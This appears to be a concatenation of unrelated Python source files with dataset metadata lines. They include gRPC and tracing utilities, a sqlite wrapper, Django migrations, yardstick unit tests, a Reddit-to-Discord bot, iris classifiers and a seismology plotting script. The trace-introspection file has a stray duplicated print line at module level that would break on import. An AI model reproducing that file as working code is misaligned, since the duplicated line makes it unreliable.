    postleitzahl = fields.Str()
    ort = fields.Str()
    netznr = fields.Str()
    preisstaffeln = fields.List(fields.Nested(TarifpreisstaffelProOrtSchema))
| 1.929688 | 2 |
src/python/src/grpc/framework/foundation/later.py | iMilind/grpc | 2 | 12770777 | # Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Enables scheduling execution at a later time."""
import time
from grpc.framework.foundation import _timer_future
def later(delay, computation):
  """Schedules later execution of a callable.

  Args:
    delay: Any numeric value. Represents the minimum length of time in seconds
      to allow to pass before beginning the computation. No guarantees are made
      about the maximum length of time that will pass.
    computation: A callable that accepts no arguments.

  Returns:
    A Future representing the scheduled computation.
  """
  deadline = time.time() + delay
  scheduled = _timer_future.TimerFuture(deadline, computation)
  scheduled.start()
  return scheduled
| 1.375 | 1 |
pycrunch_trace/client/networking/client_trace_introspection.py | yswtrue/pycrunch-trace | 90 | 12770778 | import collections
from collections import defaultdict
from typing import List, Dict
from pycrunch_trace.tracing.file_map import FileMap
class ClientTraceIntrospection:
    """In-process counters about the trace events the client has recorded."""

    # Total number of events seen across all save_events() calls.
    total_events: int

    def __init__(self):
        self.total_events = 0
        # event name -> hit count
        self.stats = defaultdict(int)
        # file id -> hit count
        self.top_files = defaultdict(int)

    def save_events(self, events: List):
        """Fold a batch of trace events into the counters.

        NOTE(review): each event is assumed to expose .event_name and
        .cursor.file — confirm against the event type.
        """
        self.total_events += len(events)
        for e in events:
            self.stats[e.event_name] += 1
            self.top_files[e.cursor.file] += 1

    def print_to_console(self, files: Dict[str, int]):
        """Pretty-print per-event and per-file hit counts to stdout.

        *files* maps filename -> file id; it is reversed so the per-id hit
        counts can be reported with human-readable filenames.
        """
        print('TraceIntrospection:')
        print(' stats:')
        for (each, hit_count) in self.stats.items():
            print(f' - {each}:{hit_count}')
        print(' files:')
        filemap = FileMap.from_reverse(files)
        # Sort files by descending hit count before printing.
        sorted_x = sorted(self.top_files.items(), reverse=True, key=lambda kv: kv[1])
        sortir = collections.OrderedDict(sorted_x)
        for (each, hit_count) in sortir.items():
            print(f' - {hit_count} hits in {filemap.filename_by_id(each)}')
print(f' - {hit_count} hits in {filemap.filename_by_id(each)}')
client_introspection = ClientTraceIntrospection()
| 2.765625 | 3 |
week4_ml/aiDB.py | ohmink/relay_02 | 1 | 12770779 | import sqlite3
class AI_DB(object):
    """Thin sqlite3 wrapper around the ``user`` table.

    Changes are only committed when the object is garbage-collected (see
    __del__) — callers should not rely on prompt finalization for durability.
    """

    def __init__(self, db_file_name):
        """Open (or create) the SQLite database at *db_file_name*."""
        self.conn = sqlite3.connect(db_file_name)
        self.cur = self.conn.cursor()

    def read_1_data(self, user_id):
        """Return the row(s) whose user_id equals *user_id* (list of tuples)."""
        # BUG FIX: the original concatenated user input straight into the
        # SQL text; use a parameterized query to prevent SQL injection.
        self.cur.execute("SELECT * FROM user WHERE user_id=?", (user_id,))
        return self.cur.fetchall()

    def read_all_data(self):
        """Return every row of the user table."""
        self.cur.execute("SELECT * FROM user")
        return self.cur.fetchall()

    def updatePersonType(self, user_id, person_type):
        """Set the person_type column for the given user_id."""
        # BUG FIX: person_type was interpolated into the SQL string — a
        # direct SQL-injection vector; bind both values as parameters.
        self.cur.execute(
            "UPDATE user SET person_type = ? WHERE user_id = ?",
            (person_type, user_id),
        )

    def __del__(self):
        print("DB class deleted.")
        self.conn.commit()
        self.conn.close()
'''
db = AI_DB("./chat2.db")
print(db.read_all_data())
print(db.read_1_data(1))
#db.updatePersonType(3, "G")
#print(db.read_all_data())
del db
#cur.execute("SELECT * FROM user")
#cur.execute("CREATE TABLE IF NOT EXISTS user(user_id integer primary key autoincrement, gender varchar(20), nickname varchar(20), type varchar(1))")
''' | 3.28125 | 3 |
FormManagement/migrations/0001_initial.py | SajedeNick1999/Payslip-Management- | 1 | 12770780 | # Generated by Django 3.0.8 on 2020-08-05 20:30
import django.contrib.postgres.fields
from django.db import migrations, models
import django.db.models.deletion
import uuid
# Auto-generated by Django's makemigrations; do not hand-edit — create a new
# migration for further schema changes.
class Migration(migrations.Migration):

    # First migration of this app.
    initial = True

    # Requires CompanyManagement's initial migration (Form has an FK to Company).
    dependencies = [
        ('CompanyManagement', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='Form',
            fields=[
                ('ID', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False, unique=True)),
                ('Field', django.contrib.postgres.fields.ArrayField(base_field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=100), size=None), size=None)),
                ('CompanyID', models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='CompanyManagement.Company')),
            ],
        ),
    ]
| 1.828125 | 2 |
a10/build/lib/a10/asvr/db/__init__.py | THS-on/AttestationEngine | 7 | 12770781 | <reponame>THS-on/AttestationEngine<gh_stars>1-10
# Copyright 2021 Nokia
# Licensed under the BSD 3-Clause Clear License.
# SPDX-License-Identifier: BSD-3-Clear
| 0.949219 | 1 |
yardstick/tests/unit/benchmark/scenarios/networking/test_vsperf_dpdk.py | mythwm/yardstick | 0 | 12770782 | <reponame>mythwm/yardstick
# Copyright 2017 Nokia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess
import time
import mock
import unittest
from yardstick.benchmark.scenarios.networking import vsperf_dpdk
class VsperfDPDKTestCase(unittest.TestCase):
def setUp(self):
self.ctx = {
"host": {
"ip": "10.229.47.137",
"user": "ubuntu",
"password": "<PASSWORD>",
},
}
self.args = {
'task_id': "1234-5678",
'options': {
'testname': 'pvp_tput',
'traffic_type': 'rfc2544_throughput',
'frame_size': '64',
'test_params': 'TRAFFICGEN_DURATION=30;',
'trafficgen_port1': 'ens4',
'trafficgen_port2': 'ens5',
'conf_file': 'vsperf-yardstick.conf',
'setup_script': 'setup_yardstick.sh',
'moongen_helper_file': '~/moongen.py',
'moongen_host_ip': '10.5.201.151',
'moongen_port1_mac': '8c:dc:d4:ae:7c:5c',
'moongen_port2_mac': '8c:dc:d4:ae:7c:5d',
'trafficgen_port1_nw': 'test2',
'trafficgen_port2_nw': 'test3',
},
'sla': {
'metrics': 'throughput_rx_fps',
'throughput_rx_fps': 500000,
'action': 'monitor',
}
}
self.scenario = vsperf_dpdk.VsperfDPDK(self.args, self.ctx)
self._mock_ssh = mock.patch(
'yardstick.benchmark.scenarios.networking.vsperf_dpdk.ssh')
self.mock_ssh = self._mock_ssh.start()
self._mock_subprocess_call = mock.patch.object(subprocess, 'call')
self.mock_subprocess_call = self._mock_subprocess_call.start()
self.addCleanup(self._cleanup)
def _cleanup(self):
self._mock_ssh.stop()
self._mock_subprocess_call.stop()
def test_setup(self):
# setup() specific mocks
self.mock_subprocess_call().execute.return_value = None
self.scenario.setup()
self.assertIsNotNone(self.scenario.client)
self.assertTrue(self.scenario.setup_done)
def test_teardown(self):
# setup() specific mocks
self.mock_subprocess_call().execute.return_value = None
self.scenario.setup()
self.assertIsNotNone(self.scenario.client)
self.assertTrue(self.scenario.setup_done)
self.scenario.teardown()
self.assertFalse(self.scenario.setup_done)
def test_is_dpdk_setup_no(self):
# setup() specific mocks
self.mock_subprocess_call().execute.return_value = None
self.scenario.setup()
self.assertIsNotNone(self.scenario.client)
self.assertTrue(self.scenario.setup_done)
# is_dpdk_setup() specific mocks
self.mock_ssh.SSH.from_node().execute.return_value = (0, 'dummy', '')
result = self.scenario._is_dpdk_setup()
self.assertFalse(result)
def test_is_dpdk_setup_yes(self):
# setup() specific mocks
self.mock_subprocess_call().execute.return_value = None
self.scenario.setup()
self.assertIsNotNone(self.scenario.client)
self.assertTrue(self.scenario.setup_done)
# is_dpdk_setup() specific mocks
self.mock_ssh.SSH.from_node().execute.return_value = (0, '', '')
result = self.scenario._is_dpdk_setup()
self.assertTrue(result)
@mock.patch.object(time, 'sleep')
def test_dpdk_setup_first(self, *args):
# setup() specific mocks
self.mock_subprocess_call().execute.return_value = None
self.scenario.setup()
self.assertIsNotNone(self.scenario.client)
self.assertTrue(self.scenario.setup_done)
# is_dpdk_setup() specific mocks
self.mock_ssh.SSH.from_node().execute.return_value = (0, 'dummy', '')
self.scenario.dpdk_setup()
self.assertFalse(self.scenario._is_dpdk_setup())
self.assertTrue(self.scenario.dpdk_setup_done)
@mock.patch.object(time, 'sleep')
def test_dpdk_setup_next(self, *args):
# setup() specific mocks
self.mock_ssh.SSH.from_node().execute.return_value = (0, '', '')
self.mock_subprocess_call().execute.return_value = None
self.scenario.setup()
self.assertIsNotNone(self.scenario.client)
self.assertTrue(self.scenario.setup_done)
self.scenario.dpdk_setup()
self.assertTrue(self.scenario._is_dpdk_setup())
self.assertTrue(self.scenario.dpdk_setup_done)
@mock.patch.object(time, 'sleep')
def test_dpdk_setup_runtime_error(self, *args):
# setup specific mocks
self.mock_ssh.SSH.from_node().execute.return_value = (0, '', '')
self.mock_subprocess_call().execute.return_value = None
self.scenario.setup()
self.assertIsNotNone(self.scenario.client)
self.mock_ssh.SSH.from_node().execute.return_value = (1, '', '')
self.assertTrue(self.scenario.setup_done)
self.assertRaises(RuntimeError, self.scenario.dpdk_setup)
@mock.patch.object(subprocess, 'check_output')
@mock.patch('time.sleep')
def test_run_ok(self, *args):
    """run() parses the CSV-style vsperf output into the result dict."""
    # setup() specific mocks
    self.mock_ssh.SSH.from_node().execute.return_value = (0, '', '')
    self.mock_subprocess_call().execute.return_value = None
    self.scenario.setup()
    self.assertIsNotNone(self.scenario.client)
    self.assertTrue(self.scenario.setup_done)
    # run() specific mocks: vsperf emits a header line and a value line
    self.mock_subprocess_call().execute.return_value = None
    self.mock_ssh.SSH.from_node().execute.return_value = (
        0, 'throughput_rx_fps\r\n14797660.000\r\n', '')
    result = {}
    self.scenario.run(result)
    self.assertEqual(result['throughput_rx_fps'], '14797660.000')
def test_run_failed_vsperf_execution(self):
    """run() raises RuntimeError when the vsperf command exits non-zero."""
    # setup() specific mocks
    self.mock_ssh.SSH.from_node().execute.return_value = (0, '', '')
    self.mock_subprocess_call().execute.return_value = None
    self.scenario.setup()
    self.assertIsNotNone(self.scenario.client)
    self.assertTrue(self.scenario.setup_done)
    # vsperf invocation fails with exit status 1
    self.mock_ssh.SSH.from_node().execute.return_value = (1, '', '')
    result = {}
    self.assertRaises(RuntimeError, self.scenario.run, result)
def test_run_falied_csv_report(self):
    """run() raises RuntimeError when fetching the CSV report fails.

    NOTE(review): the method name misspells 'failed' as 'falied'; renaming
    would change the reported test id, so it is only flagged here.
    """
    # setup() specific mocks
    self.mock_ssh.SSH.from_node().execute.return_value = (0, '', '')
    self.mock_subprocess_call().execute.return_value = None
    self.scenario.setup()
    self.assertIsNotNone(self.scenario.client)
    self.assertTrue(self.scenario.setup_done)
    # run() specific mocks: the report retrieval command exits non-zero
    self.mock_subprocess_call().execute.return_value = None
    self.mock_ssh.SSH.from_node().execute.return_value = (1, '', '')
    result = {}
    self.assertRaises(RuntimeError, self.scenario.run, result)
| 1.78125 | 2 |
pro1/interviews/urls.py | BhanuPrakashNani/StudentPortal | 0 | 12770783 | <filename>pro1/interviews/urls.py<gh_stars>0
from django.urls import path,include
from . import views
# Route the app root ('') to the interviews home view.
urlpatterns = [
    path('', views.home, name='interview-home'),
]
| 1.75 | 2 |
src/versions/Iter4/helpapp-seproject/api/update_user.py | chenbachar/MitzvahApp | 0 | 12770784 | import webapp2
import json
from models.user import User
class UpdateUserHandler(webapp2.RequestHandler):
    """Handles GET /update_user: updates the current user's name and car flag."""

    def get(self):
        """Update profile fields for the authenticated user.

        Writes ``{"status": "ok"}`` on success, ``{"status": "error"}``
        when either query parameter is missing or empty.
        """
        current_user = User.checkUser()
        if not current_user:
            # No authenticated user; return without writing a body.
            return
        new_name = self.request.get('name')
        car_param = self.request.get('car')
        # Only the literal string 'true' enables the car flag.
        needs_car = car_param == 'true'
        if new_name and car_param:
            User.updateInfo(current_user.email, new_name, needs_car)
            self.response.write(json.dumps({'status': 'ok'}))
        else:
            self.response.write(json.dumps({'status': 'error'}))
# WSGI application mapping /update_user to the handler above.
app = webapp2.WSGIApplication([
    ('/update_user', UpdateUserHandler)
], debug=True)
next/boot/fe/parser.py | 27Saumya/next | 2 | 12770785 | <reponame>27Saumya/next
# Copyright 2022 VincentRPS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import rply
from .ast import Print, Integer
from .lexer import listed
from ..be import Configurator
class Parser:
    """rply-based parser wiring grammar productions to IR-emitting AST nodes."""

    def __init__(self, ir: Configurator):
        """Create the parser generator over the lexer's token names."""
        self._parser = rply.ParserGenerator(listed)
        self.ir = ir

    def start(self):
        """Register the grammar productions on the parser generator."""

        @self._parser.production('program : PRINT OPEN_PAREN expression CLOSE_PAREN')
        def handle_print(tokens):
            # tokens[2] is the parsed expression inside the parentheses.
            return Print(self.ir, tokens[2])

        @self._parser.production('expression : INTEGER')
        def handle_integer(tokens):
            return Integer(self.ir, tokens[0].value)

    def build(self):
        """Return the built rply parser."""
        return self._parser.build()
jobapplications/migrations/0005_auto_20200204_1927.py | MattYu/ConcordiaAce | 1 | 12770786 | <gh_stars>1-10
# Generated by Django 3.0 on 2020-02-05 00:27
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema changes for Ranking: drops preferredName, adds
    # the is_ranking_open flag (default True) and updates the status choices
    # (new default: 'Interviewing').

    dependencies = [
        ('jobapplications', '0004_auto_20200204_0004'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='ranking',
            name='preferredName',
        ),
        migrations.AddField(
            model_name='ranking',
            name='is_ranking_open',
            field=models.BooleanField(default=True),
        ),
        migrations.AlterField(
            model_name='ranking',
            name='status',
            field=models.CharField(choices=[('Pending Review', 'Pending Coop Review'), ('Not Approved', 'Not Approved'), ('Submitted', 'Submitted to Employer'), ('Interviewing', 'Selected for Interview'), ('Not Selected', 'Not Selected'), ('Ranked', 'Ranked by Employer'), ('Matched', 'Matched'), ('Not Matched', 'Not Matched'), ('Closed', 'Closed')], default='Interviewing', max_length=20),
        ),
    ]
| 1.757813 | 2 |
irisProblem.py | wriggs12/Machine-Learning-Practice | 1 | 12770787 | <filename>irisProblem.py<gh_stars>1-10
import numpy as np
from scipy.spatial import distance
import matplotlib.pyplot as plt
def euc(a, b):
    """Return the Euclidean distance between points ``a`` and ``b``."""
    dist = distance.euclidean(a, b)
    return dist
class personalKNN:
    """1-nearest-neighbour classifier built on the euc() distance helper."""

    def fit(self, X_train, y_train):
        """Memorise the training samples and their labels."""
        self.X_train = X_train
        self.y_train = y_train

    def predict(self, X_test):
        """Return the predicted label for every row of ``X_test``."""
        return [self.closest(sample) for sample in X_test]

    def closest(self, row):
        """Return the label of the training sample nearest to ``row``.

        Ties keep the earliest training sample, matching a strict '<' scan.
        """
        candidates = range(len(self.X_train))
        best = min(candidates, key=lambda idx: euc(row, self.X_train[idx]))
        return self.y_train[best]
class personalKMean:
    """Plain k-means clustering with a percent-change convergence test."""

    def __init__(self, k=3, tol=0.0001, maxIterations=300):
        self.k = k                        # number of clusters
        self.tol = tol                    # convergence tolerance (percent change)
        self.maxIterations = maxIterations

    def fit(self, data):
        """Cluster ``data`` (indexable collection of vectors) into self.k groups."""
        # Seed the centroids with the first k samples.
        self.clusters = {idx: data[idx] for idx in range(self.k)}

        for _ in range(self.maxIterations):
            self.classifications = {idx: [] for idx in range(self.k)}

            # Assign every sample to its nearest centroid.
            for sample in data:
                self.classifications[self.predict(sample)].append(sample)

            previous = dict(self.clusters)

            # Move each centroid to the mean of its assigned samples.
            for idx in self.classifications:
                self.clusters[idx] = np.average(self.classifications[idx], axis=0)

            converged = True
            for idx in self.clusters:
                # Signed percent change summed over coordinates, as in the
                # original implementation (divides by the previous centroid).
                change = np.sum((self.clusters[idx] - previous[idx]) / previous[idx] * 100.0)
                if change > self.tol:
                    converged = False

            if converged:
                break

    def predict(self, data):
        """Return the index of the centroid closest to ``data``."""
        distances = [np.linalg.norm(data - self.clusters[c]) for c in self.clusters]
        return distances.index(min(distances))
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn import tree
# Load the iris data set and hold out half of it for evaluation.
iris = load_iris()
X = iris.data
y = iris.target
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.5)
#1 Decision Tree Classifier
# Train sklearn's decision tree and report held-out accuracy.
treeClassifier = tree.DecisionTreeClassifier()
treeClassifier.fit(X_train, y_train)
treePrediction = treeClassifier.predict(X_test)
print('Accuracy using a Decision Tree')
print(accuracy_score(y_test, treePrediction))
#2 K-Nearest Neighbors Classifier
# Evaluate the hand-rolled 1-NN classifier on the same split.
personalClassifier = personalKNN()
personalClassifier.fit(X_train, y_train)
personalPrediction = personalClassifier.predict(X_test)
print('Accuracy using my own K Nearest Neighbor Model')
print(accuracy_score(y_test, personalPrediction))
#3 K-Means Classifier
# NOTE(review): k-means cluster indices are arbitrary — comparing them
# directly to class labels only measures accuracy when cluster i happens
# to align with label i; consider mapping clusters to majority labels.
personalMeanClassifier = personalKMean()
personalMeanClassifier.fit(X_train)
correct = 0
for i in range(len(X_test)):
    dataPoint = X_test[i]
    prediction = personalMeanClassifier.predict(dataPoint)
    if prediction == y_test[i]:
        correct += 1
accuracy = correct / len(X_test)
print('Accuracy using my own K Means Clustering Model')
print(accuracy)
script_remote.py | ArthurSStrong/actions-bot | 0 | 12770788 | <gh_stars>0
"""
Connects to the Reddit API to get rising submissions details and posts
them to a Discord webhook.
"""
import os
import requests
import random
# Discord webhook endpoint; the WEBHOOK environment variable must be set
# before this module is imported (KeyError otherwise).
WEBHOOK_URL = os.environ["WEBHOOK"]
def main():
    """Pick a random art subreddit, fetch one post and forward it to Discord."""
    art_subreddits = ['doodles', 'DigitalPainting', 'drawing', 'Illustration',
                      'conceptart', 'painting', 'Watercolor']
    print("Connecting to Reddit...")
    message, image_url = get_rising_submissions(random.choice(art_subreddits))
    print("Data received. Sending webhook...")
    post_message(message, image_url)
def get_rising_submissions(subreddit):
    """Fetch the first entry from a random ('top' or 'rising') subreddit listing.

    Parameters
    ----------
    subreddit : str
        The name of the subreddit without forward slashes.

    Returns
    -------
    tuple
        A tuple containing a formatted message and an image url.

    Raises
    ------
    ValueError
        If the listing comes back empty.
    """
    endpoint = random.choice(['top', 'rising'])
    url = f"https://www.reddit.com/r/{subreddit}/{endpoint}.json?limit=1"
    headers = {"User-Agent": "Reddit Rising Checker v1.0"}

    with requests.get(url, headers=headers) as response:
        data = response.json()["data"]["children"]

    if not data:
        # Bug fix: an empty listing previously fell through and returned
        # None implicitly, making the caller fail with an opaque
        # "cannot unpack" TypeError.
        raise ValueError(f"No submissions returned for r/{subreddit}")

    # The query asks for limit=1, so only the first child matters.
    item_data = data[0]["data"]
    title = item_data["title"]
    permalink = "https://reddit.com" + item_data["permalink"]
    author = item_data["author"]
    score = item_data["score"]
    image_url = item_data["url"]

    # Compose a Markdown message using string formatting.
    message = f"[{title}]({permalink})\nby **{author}**\n**{score:,}** points"

    return (message, image_url)
def post_message(message, image_url):
    """Deliver the formatted message to the configured Discord webhook.

    Parameters
    ----------
    message : str
        The formatted message to post.
    image_url : str
        The URL used as the thumbnail.
    """
    embed = {
        "title": "Tendencia de Arte en Reddit",
        "color": 102204,
        "description": message,
        "thumbnail": {"url": image_url},
        "footer": {"text": "Powered by Trashpandas™"}
    }
    payload = {"username": "Mapache.Bot", "embeds": [embed]}

    with requests.post(WEBHOOK_URL, json=payload) as response:
        # Surface the HTTP status so failures are visible in the logs.
        print(response.status_code)
# Run only when executed as a script (not on import).
if __name__ == "__main__":
    main()
| 3.703125 | 4 |
libtool/util/regex.py | matan-h/libtool | 0 | 12770789 | <reponame>matan-h/libtool<filename>libtool/util/regex.py
import re
def get_val(val, string):
    """Return the quoted value assigned to ``val`` inside ``string``.

    Matches patterns such as ``name = "value"`` or ``name='value'`` and
    returns the text between the quotes.  Raises IndexError when no
    assignment to ``val`` is found (same as before).
    """
    # Bug fix: ``val`` used to be interpolated into the pattern unescaped,
    # so keys containing regex metacharacters corrupted the expression.
    # Also replaces the odd non-raw ``(\s|)+`` construct with r"\s*".
    pattern = r"""{}\s*=\s*(["'])(.*)(["'])""".format(re.escape(val))
    return re.findall(pattern, string)[0][1]
| 2.875 | 3 |
mysite/asd.py | iml1111/django-study | 0 | 12770790 | <reponame>iml1111/django-study
from django_jwt_extended.decorators import jwt_required
# NOTE(review): throwaway experiment — defines a @jwt_required-decorated
# function and calls it at import time; presumably this only works inside
# a request context. Verify before keeping.
@jwt_required()
def asdasdasd():
    return "sad"


asdasdasd()
core/filters.py | ankit94/ShoppingWebsiteDjango | 0 | 12770791 | <gh_stars>0
import django_filters
from django_filters import CharFilter
from .models import Item
class ItemFilter(django_filters.FilterSet):
    """Filter set allowing case-insensitive substring search on Item.title."""

    # icontains -> case-insensitive "contains" lookup on the title field.
    title = CharFilter(field_name='title', lookup_expr='icontains')

    class Meta:
        model = Item
        fields = ['title']
| 1.789063 | 2 |
scripts/plot_Figure5.py | pabloitu/pycsep_esrl-1 | 0 | 12770792 | <reponame>pabloitu/pycsep_esrl-1
# Python imports
import os
import json
import time
# 3rd party impoorts
import numpy as np
import matplotlib.pyplot as plt
import cartopy.crs as ccrs
# pycsep imports
from csep import load_catalog_forecast, load_catalog, load_json, load_evaluation_result
from csep.models import Event, Polygon
from csep.core.regions import (
generate_aftershock_region,
california_relm_region,
masked_region,
magnitude_bins,
create_space_magnitude_region
)
from csep.core.catalogs import CSEPCatalog
from csep.core.forecasts import GriddedDataSet
from csep.core.catalog_evaluations import spatial_test, number_test
from csep.utils.constants import SECONDS_PER_WEEK
from csep.utils.plots import plot_spatial_dataset, plot_number_test, plot_spatial_test
from csep.utils.scaling_relationships import WellsAndCoppersmith
from csep.utils.time_utils import epoch_time_to_utc_datetime, datetime_to_utc_epoch
# local imports
from experiment_utilities import california_experiment, italy_experiment
def sort_by_longitude(coords):
    """Return the rows of ``coords`` reordered by ascending first column."""
    order = coords[:, 0].argsort()
    return coords[order]
# file-path for results
sim_name = '2019_09_04-ComCatM7p1_ci38457511_ShakeMapSurfaces'
simulation_dir = f'/Users/wsavran/Research/ridgecrest_evaluation_bssa/{sim_name}'
results_dir = f'/Users/wsavran/Research/ridgecrest_evaluation_bssa/updated_analysis/ucerf3-ridgecrest/{sim_name}'
ucerf3_raw_data = os.path.join(simulation_dir, 'results_complete.bin')
m71_event = os.path.join(simulation_dir, 'm71_event.json')
ucerf3_config = os.path.join(results_dir, 'config.json')
catalog_fname = os.path.join(results_dir, 'evaluation_catalog.json')
n_test_result_fname = os.path.join(results_dir, 'results/n-test_mw_2p5.json')

# magnitude range
min_mw = 2.5
max_mw = 8.95
dmw = 0.1

# define start and end epoch of the forecast
with open(ucerf3_config, 'r') as config_file:
    config = json.load(config_file)
start_epoch = config['startTimeMillis']
# one-week horizon; epochs appear to be milliseconds (see startTimeMillis)
end_epoch = start_epoch + SECONDS_PER_WEEK * 1000

# number of fault radii to use for spatial filtering
num_radii = 3
# load evaluation catalog
catalog = load_json(CSEPCatalog(), catalog_fname)

# load event
event = load_json(Event(), m71_event)
event_epoch = datetime_to_utc_epoch(event.time)

# define aftershock region and magnitude region
# rupture length scaled by num_radii around the mainshock epicenter
rupture_length = WellsAndCoppersmith.mag_length_strike_slip(event.magnitude) * 1000
aftershock_polygon = Polygon.from_great_circle_radius((event.longitude, event.latitude), num_radii*rupture_length, num_points=100)

# region from scratch using pycsep
# NOTE(review): aftershock_region is built here but not used below — the
# catalog's own region feeds create_space_magnitude_region; confirm intent.
aftershock_region = masked_region(california_relm_region(dh_scale=4, use_midpoint=False), aftershock_polygon)
mw_bins = magnitude_bins(min_mw, max_mw, dmw)
smr = create_space_magnitude_region(catalog.region, mw_bins)

# some checks to show that we obtain the same region
assert smr == catalog.region
# create forecast object
# filters restrict events to the forecast window and minimum magnitude
filters = [
    f'origin_time >= {start_epoch}',
    f'origin_time < {end_epoch}',
    f'magnitude >= {min_mw}'
]
print('Before filtering observation catalog')
print(catalog)
print('After filtering observation catalog')
catalog = catalog.filter(filters).filter_spatial(region=smr)
# apply the magnitude of completeness correction around the mainshock
catalog = catalog.apply_mct(event.magnitude, event_epoch)
print(catalog)
u3etas_forecast = load_catalog_forecast(
    ucerf3_raw_data,
    start_time = epoch_time_to_utc_datetime(start_epoch),
    end_time = epoch_time_to_utc_datetime(end_epoch),
    region=smr,
    type='ucerf3',
    event=event,
    filters=filters,
    filter_spatial=True,
    apply_mct=True,
    apply_filters=True,
)
# evaluate forecasting model
print('computing number test results')
n_test = number_test(u3etas_forecast, catalog)
print('computing spatial test results')
s_test = spatial_test(u3etas_forecast, catalog, verbose=False)

# plot the results
# Bug fix: the original had a stray closing parenthesis on the
# plot_spatial_test() call (a SyntaxError) and never captured the axes
# returned by either plot, so both savefig() calls referenced an
# undefined ``ax``.  Each plot is now captured and saved in turn.
ax = plot_number_test(n_test, show=False, plot_args={'title': ''})
ax.get_figure().savefig('../figures/Figure5b.png', dpi=300)
ax = plot_spatial_test(s_test, show=False, plot_args={'title': ''})
ax.get_figure().savefig('../figures/Figure5c.png', dpi=300)
# compares the test distribution computed here and from the old manuscript
# plot forecast
# styling for the forecast map (Figure 5a), with the observed catalog overlaid
plot_args = {
    'projection': ccrs.PlateCarree(),
    'legend': True,
    'legend_loc': 1,
    'grid_fontsize': 12,
    'frameon': True,
    'mag_ticks': [2.5, 3.0, 3.5, 4.0],
    'markercolor': 'gray',
    'legend_titlesize': 16,
    'legend_fontsize': 12,
    'mag_scale': 5,
    'catalog': catalog,
    'edgecolor': 'black'
}
ax = u3etas_forecast.plot(show=True, plot_args=plot_args)
ax.get_figure().savefig('../figures/Figure5a.png', dpi=300)
| 1.789063 | 2 |
resource_tracker/migrations/0005_auto_20211015_1015.py | LaudateCorpus1/squest | 112 | 12770793 | # Generated by Django 3.2.7 on 2021-10-15 08:15
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('resource_tracker', '0004_alter_resourcepoolattributedefinition_resource_pool'),
]
operations = [
migrations.RenameField(
model_name='resourcegroupattributedefinition',
old_name='resource_group_definition',
new_name='resource_group',
),
migrations.RenameField(
model_name='resourcegrouptextattributedefinition',
old_name='resource_group_definition',
new_name='resource_group',
),
migrations.AlterUniqueTogether(
name='resourcegroupattributedefinition',
unique_together={('name', 'resource_group')},
),
migrations.AlterUniqueTogether(
name='resourcegrouptextattributedefinition',
unique_together={('name', 'resource_group')},
),
]
| 1.679688 | 2 |
api/core/migrations/0001_initial.py | JRMurr/rps | 1 | 12770794 | <filename>api/core/migrations/0001_initial.py<gh_stars>1-10
# Generated by Django 2.2.5 on 2019-09-19 23:17
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated initial schema: Game, Match, MatchConfig, a Player proxy
    # over auth.User, and the PlayerMatch/PlayerGame through tables linking
    # players to matches and games.

    initial = True

    dependencies = [
        ('auth', '0011_update_proxy_permissions'),
    ]

    operations = [
        migrations.CreateModel(
            name='Game',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('game_num', models.PositiveSmallIntegerField()),
            ],
            options={
                'ordering': ('match_id', 'game_num'),
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='Match',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('start_time', models.DateTimeField()),
                ('duration', models.PositiveIntegerField()),
            ],
            options={
                'ordering': ('-start_time',),
            },
        ),
        migrations.CreateModel(
            name='MatchConfig',
            fields=[
